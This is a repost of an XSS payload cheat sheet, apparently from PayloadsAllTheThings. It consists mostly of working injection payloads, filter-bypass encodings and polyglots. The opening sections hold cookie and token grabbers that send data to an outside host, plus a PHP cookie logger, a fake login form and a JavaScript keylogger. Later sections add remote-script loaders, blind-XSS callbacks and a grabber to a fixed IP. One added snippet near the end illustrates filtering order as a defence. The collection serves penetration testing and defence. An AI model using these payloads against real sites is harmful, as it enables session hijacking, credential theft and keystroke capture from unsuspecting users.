XSS payload collection: learn how to do more with XSS
Reposted from: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

Summary
[TOC]
Exploit code or POC

Data grabber for XSS
Obtain the administrator cookie or a sensitive access token; the following payloads send it to a page under the tester's control.

```html
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
```

Write the collected data to a file.

```php
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
```

CORS

```html
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
});
</script>
```

UI Redressing
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.

```html
<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>
```

JavaScript keylogger
Another way to collect sensitive data is to set up a JavaScript keylogger.

```html
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
```

Other ways
More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all:

Identify an XSS endpoint
This payload opens the debugger in the developer console rather than triggering a popup alert box.

```html
<script>debugger;</script>
```
Modern applications with content hosting can use a sandbox domain to safely host various types of user-generated content. Many sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript or Flash applets and make sure that they cannot access any user data.

Therefore, it is better to use alert(document.domain) or alert(window.origin) rather than alert(1) as the default XSS payload, in order to know in which scope the XSS is actually executing.

Better payload to replace <script>alert(1)</script>:

```html
<script>alert(document.domain.concat("\n").concat(window.origin))</script>
```

While alert() is fine for reflected XSS, it quickly becomes a burden for stored XSS because the popup has to be closed on every execution, so console.log() can be used instead to show a message in the developer console (no interaction required).

Example:

```html
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
```

References:

Tools
Most tools are also suitable for blind XSS attacks:

XSStrike: very popular but unfortunately not very well maintained
xsser: utilizes a headless browser to detect XSS vulnerabilities
Dalfox: extensive functionality and extremely fast, written in Go
XSpear: similar to Dalfox but based on Ruby
domdig: headless Chrome XSS tester
XSS in HTML/Applications

Common payloads

```html
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="javascript:alert(23)">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

// Svg payload
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert('33')

// Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```
XSS using HTML5 tags

```html
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>

<body ontouchstart=alert(1)> // Triggers when a finger touches the screen
<body ontouchend=alert(1)>   // Triggers when a finger is removed from the touch screen
<body ontouchmove=alert(1)>  // When a finger is dragged across the screen.
```

XSS using remote JS

```html
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>

<script src=14.rs>
// you can also specify an arbitrary payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain)
```

XSS in hidden inputs

```html
<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event
```

XSS when the payload is reflected in uppercase

```html
<IMG SRC=1 ONERROR=alert(1)>
```

DOM-based XSS
Based on a DOM XSS sink.

```
#"><img src=/ onerror=alert(2)>
```

XSS in JS context

```js
-(confirm)(document.domain)//
; alert(1);//
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
```
XSS in wrapper javascript: and data: URIs

XSS with the javascript: scheme:

```
javascript:prompt(1)

%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341

javascript:confirm(1)

We can encode the "javascript:" in Hex/Octal
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)

We can use a 'newline character'
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)

Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)

Using the newline and a comment //
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
```

XSS with the data: scheme:

```html
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```

XSS with vbscript: IE only
XSS in files
Note: the XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.

```xml
<name>
  <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
```

XSS in XML

```xml
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>
```

XSS in SVG

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
```

XSS in SVG (short)

```xml
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```

XSS in Markdown

```
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```

XSS in SWF Flash applications

```
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
```

More payloads in ./Files

XSS in SWF Flash applications

```
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
```

XSS in CSS

```html
<!DOCTYPE html>
<html>
<head>
<style>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style>
</head>
  <body>
    <div>lol</div>
  </body>
</html>
```
XSS in PostMessage
If the target origin is the asterisk *, the message can be sent to any domain that has a reference to the child page.

```html
<html>
<body>
    <input type=button value="Click Me" id="btn">
</body>

<script>
document.getElementById('btn').onclick = function(e){
    window.poc = window.open('http://www.redacted.com/#login');
    setTimeout(function(){
        window.poc.postMessage(
            {
                "sender": "accounts",
                "url": "javascript:confirm('XSS')",
            },
            '*'
        );
    }, 2000);
}
</script>
</html>
```

Blind XSS

XSS Hunter
XSS Hunter is deprecated; it was available at https://xsshunter.com/app. You can self-host it from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express).

XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.

```html
"><script src=//<your.subdomain>.xss.ht></script>
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
```

Other Blind XSS tools

Blind XSS endpoints
Contact forms
Ticket support
Referrer header
User-agent
Comment box

Tips
You can use a [Data Grabber for XSS](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#data-grabber-for-xss) and a single-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.

E.g. payload:

```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```

E.g. single-line HTTP server:

```
$ ruby -run -ehttpd . -p8080
```
Mutated XSS
Use browser quirks to recreate some HTML tags when the payload is placed inside element.innerHTML.

Mutated XSS from Masato Kinugawa for the DOMPurify component used in Google Search. Technical write-ups are available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.

```html
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
```

Polyglot XSS

Polyglot XSS - 0xsobky

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```

Polyglot XSS - Ashar Javed

```
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```

Polyglot XSS - Mathias Karlsson

```
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
```

Polyglot XSS - Rsnake

```
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```

Polyglot XSS - Daniel Miessler

```
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
```

Polyglot XSS - @s0md3v

```
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```

```
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```

Polyglot XSS - from @filedescriptor's Polyglot Challenge

```
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>

# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>

# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
```

Polyglot XSS - from Brutelogic

```
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
```
Filter bypass and exotic payloads

Bypass case sensitive

```html
<sCrIpt>alert(1)</ScRipt>
```

Bypass tag blacklist

```html
<script x>
<script x>alert('XSS')<script y>
```

Bypass word blacklist with code evaluation

```js
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```

Bypass with incomplete HTML tag
Works on IE/Firefox/Chrome/Safari

```html
<img src='1' onerror='alert(0)' <
```

Bypass quotes for string

```js
String.fromCharCode(88,83,83)
```

Bypass quotes in script tag

```
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
<?php echo 'foo="text '.$_GET['test'].'";';`?>
</script>
</html>
```

Bypass quotes in mousedown event
You can bypass a single quote with &#39; in an onmousedown event handler.

```html
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
```

Bypass dot filter

```html
<script>window['alert'](document['domain'])</script>
```

Convert an IP address into decimal format, i.e. http://192.168.1.1 → http://3232235777
http://www.geektools.com/cgi-bin/ipconv.cgi

```html
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))</script>
```

Base64-encode the XSS payload with a Linux command, i.e. echo -n "alert(document.cookie)" | base64 → YWxlcnQoZG9jdW1lbnQuY29va2llKQ==
Bypass parenthesis for string

```js
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
```

Bypass parenthesis and semicolon

```html
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>

// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>

// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```

Bypass onxxxx= blacklist

```html
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

// Bypass onxxx= filter with a null byte/vertical tab
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />

// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />
```

Bypass space filter

```
// Bypass space filter with "/"
<img/src='1'/onerror=alert(0)>

// Bypass space filter with 0x0c/^L
<svgonload=alert(1)>
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
```

Bypass email filter (RFC compliant)

```
"><svg/onload=confirm(1)>"@x.y
```

Bypass document blacklist

```html
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
window["doc"+"ument"]
```

Bypass document.cookie blacklist
This is another way to access cookies on Chrome, Edge and Opera. Replace COOKIE NAME with the cookie you want to access. You could also look into the getAll() method if it fits your needs.

```js
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
```

Bypass using javascript inside a string

```html
<script>
foo="text </script><script>alert(1)</script>";
</script>
```

Bypass using an alternate way to redirect

```js
location="http://google.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
```

Bypass using an alternate way to execute an alert
From @brutelogic's tweet.

```js
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)

[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
```

From @theMiddle - using global variables

The Object.keys() method returns an array of a given object's own property names, in the same order as a normal for...in loop would produce. That means a JavaScript function can be reached by its index number rather than by its name.

```js
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5
```

This is the same as calling alert:

```js
Object.keys(self)[5]
// "alert"
self[Object.keys(self)[5]]("1") // alert("1")
```

We can find "alert" with a regular expression like ^a[rel]+t$:

```js
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()

// then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1")
```

One line:

```js
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
```

From @Quanyang's tweet.

```js
prompt`${document.domain}`
document.location='java\tscript:alert(1)'
document.location='java\rscript:alert(1)'
document.location='java\tscript:alert(1)'
```

From @404death's tweet.

```js
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;

constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();

top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);

open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';

setTimeout`alert\u0028document.domain\u0029`;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```

Bypass using an alternate way to trigger an alert

```js
var i = document.createElement("iframe");
i.onload = function(){
  i.contentWindow.alert(1);
}
document.appendChild(i);

// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
    var proxy = obj[name];
    obj[name] = function () {
      if (exec_original) {
        return proxy.apply(this, arguments);
      }
    };
    XSSObject.lockdown(obj, name);
};
XSSObject.proxy(window, 'alert', 'window.alert', false);
```
Bypass ">" using nothing
You don't need to close your tags.

Bypass "<" and ">" using ＜ and ＞
Unicode characters U+FF1C and U+FF1E

```html
＜script/src=//evil.site/poc.js＞
```

Bypass ";" using another character

```js
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';
```

Bypass using HTML encoding

```
%26%2397;lert(1)
alert
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
```

Bypass using Katakana
Using the Katakana library.

```js
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```

Bypass using Cuneiform

```js
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```

Bypass using Lontara

```js
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```

More alphabets at http://aem1k.com/aurebesh.js/#

Bypass using ECMAScript6

```html
<script>alert`1`</script>
```

Bypass using octal encoding

```
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```

Bypass using Unicode

```
Unicode character U+FF1C FULLWIDTH LESS-THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS-THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')

E.g.: http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
%EF%BC%9E becomes >
%EF%BC%9C becomes <
```

Bypass using Unicode converted to uppercase

```
İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf).toUpperCase() => S
K (%E2%84%AA).toLowerCase() => k

<ſvg onload=... > becomes <SVG ONLOAD=...>
<ıframe id=x onload=>.toUpperCase() becomes <IFRAME ID=X ONLOAD=>
```
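The case-mapping bypass above comes down to the order of filtering and normalisation. The snippet below is an added illustration, not code from PayloadsAllTheThings: a constructed tag blocklist applied before the application upper-cases its input lets the long-s and dotless-i variants through, while the same blocklist applied to the canonical form catches them. The filter, function names and sample inputs are all assumptions made for this example.

```javascript
// Added example, not from the original page: why a blocklist that runs
// before Unicode case mapping is bypassed by look-alike letters
// (U+017F LATIN SMALL LETTER LONG S, U+0131 LATIN SMALL LETTER DOTLESS I),
// and why canonicalising first and filtering the canonical form fixes it.

// Constructed, deliberately naive tag blocklist. Note: no /u flag, so in
// ignore-case mode a non-ASCII character is never matched against an
// ASCII letter; "ſvg" therefore does not match "svg".
const BLOCKED_TAG = /<\s*(svg|iframe|script|img)\b/i;

// Vulnerable order: the raw input is checked, and only afterwards the
// application upper-cases it (e.g. for case-insensitive storage or
// display). toUpperCase() maps U+017F -> "S" and U+0131 -> "I", so the
// output now contains exactly the tag the blocklist was meant to stop.
function filterThenCanonicalise(input) {
  if (BLOCKED_TAG.test(input)) {
    return { blocked: true, output: null };
  }
  return { blocked: false, output: input.toUpperCase() };
}

// Hardened order: apply the same transformation the application will
// apply later, then run the blocklist over that canonical form, so the
// filter sees what the browser (or the next component) will see.
function canonicaliseThenFilter(input) {
  const canonical = input.toUpperCase();
  if (BLOCKED_TAG.test(canonical)) {
    return { blocked: true, output: null };
  }
  return { blocked: false, output: canonical };
}

// Constructed sample inputs mirroring the two cases shown on the page.
const LONG_S_SAMPLE = "<\u017Fvg onload=x>";    // <ſvg onload=x>
const DOTLESS_I_SAMPLE = "<\u0131frame id=x>";  // <ıframe id=x>
const PLAIN_SAMPLE = "<svg onload=x>";           // caught by both orders
```

A blocklist is only a demonstration vehicle here; in practice the canonical form should be handed to an allowlist-based HTML sanitizer, and the same "normalise first, then validate" order applies to every other transformation the application performs on untrusted input.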
Bypass using UTF-7

```
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
```

Bypass using UTF-8

```
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
```

Bypass using UTF-16be

```
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
```

Bypass using UTF-32

```
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```

Bypass using BOM
Byte Order Mark (the page must begin with the BOM character). The BOM character allows you to override the charset of the page.

```
BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E

BOM Character for UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
